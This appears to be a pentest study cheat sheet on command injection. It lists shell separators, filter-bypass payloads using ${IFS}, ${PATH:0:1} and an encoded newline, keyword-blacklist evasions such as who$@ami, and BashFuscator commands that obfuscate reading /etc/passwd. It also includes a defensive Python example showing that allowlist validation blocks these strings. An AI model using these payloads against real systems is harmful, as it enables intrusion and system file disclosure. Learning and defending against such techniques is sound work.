Command Injection

Basic Command Injection

;      # semicolon
\n     # newline (%0a)
&      # background
|      # pipe
&&     # AND
||     # OR
``     # subshell (backticks)
$()    # subshell

Advanced Command Injection

When spaces and paths (/etc/passwd, /, /home) are not allowed

# %0a is a URL-encoded newline
# ls lists files
# ${IFS} stands in for a space when spaces are blacklisted
# ${PATH:0:1} takes the first character of the PATH variable, which is /

ip=127.0.0.150%0als${IFS}${PATH:0:1} 

# The final command becomes

127.0.0.1
ls /

Bypassing Blacklists (whoami, pwd, ls, cat)

who$@ami
w`h`o`a`mi  # the number of inserted backticks should be even
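
Added example, not part of the original page: the strings shown above pass character and keyword blacklists but fail an allowlist that accepts only a literal IP address, and the validated value is then handed to the program as an argument vector so no shell parses it. The filter patterns, function names, and the ping use case are assumptions made for illustration.

```python
import ipaddress
import re
from typing import Optional
from urllib.parse import unquote

# Constructed filters modelling the two blacklists this page describes.
BAD_CHARS = re.compile(r"[ /]")                     # spaces and paths rejected
BAD_WORDS = re.compile(r"\b(whoami|pwd|ls|cat)\b")  # command names rejected

def passes_blacklist(value, pattern) -> bool:
    """Weak check: accept anything in which the blacklist pattern is absent."""
    return pattern.search(value) is None

def parse_ip_strict(value: str) -> Optional[str]:
    """Allowlist check: accept only a complete, literal IP address."""
    try:
        return str(ipaddress.ip_address(value))
    except ValueError:
        return None

def ping_argv(value: str) -> list:
    """Argument vector for subprocess.run(argv); no shell ever parses it."""
    ip = parse_ip_strict(value)
    if ip is None:
        raise ValueError("ip parameter is not an IP address")
    return ["ping", "-c", "1", ip]

# Strings taken from this page, plus one benign value (constructed).
SAMPLES = [
    ("127.0.0.150%0als${IFS}${PATH:0:1}", BAD_CHARS),
    ("who$@ami", BAD_WORDS),
    ("127.0.0.1", BAD_CHARS),
]

def audit(samples=SAMPLES):
    """Return (raw, passes_blacklist, strict_result) for each sample."""
    rows = []
    for raw, pattern in samples:
        decoded = unquote(raw)  # the filter sees the URL-decoded value
        rows.append((raw, passes_blacklist(decoded, pattern),
                     parse_ip_strict(decoded)))
    return rows

if __name__ == "__main__":
    for raw, weak, strict in audit():
        print(f"{raw!r:40} blacklist_pass={weak!s:5} strict={strict}")
```
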

Automated Obfuscation Tool for Command Injection

BashFuscator

We can use this tool to obfuscate our command:

bashfuscator -c "cat /etc/passwd"

This produces a very large payload. To make it shorter, we can use the command below:

bashfuscator -c 'cat /etc/passwd' -s 1 -t 1 --no-mangling --layers 1
